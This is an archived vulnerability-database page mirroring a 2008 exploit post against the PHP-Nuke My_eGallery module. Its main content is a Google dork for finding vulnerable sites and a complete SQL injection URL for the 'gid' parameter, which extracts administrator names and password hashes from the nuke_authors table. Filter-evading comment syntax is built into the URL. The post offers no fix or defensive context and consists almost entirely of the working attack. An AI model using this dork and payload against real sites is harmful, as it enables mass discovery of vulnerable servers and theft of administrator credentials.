Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19301
HistoryFeb 29, 2008 - 12:00 a.m.

PHP-Nuke My_eGallery "gid" Remote SQL Injection

2008-02-2900:00:00
vulners.com
67

Aria-Security Team
http://Aria-Security.Net

Shoutz: Aura, Null, imm02tal, Kinglet, and our staff
PHP-Nuke My_eGallery "gid" Remote SQL Injection
Dork: inurl:"modules.php?name=My_eGallery"

modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1//union//select//aid,pwd//from//nuke_authors//where/**/radminsuper=1/*

The-0utl4w
From Aria-Security.Net

Original Link: http://forum.aria-security.net/showthread.php?p=1490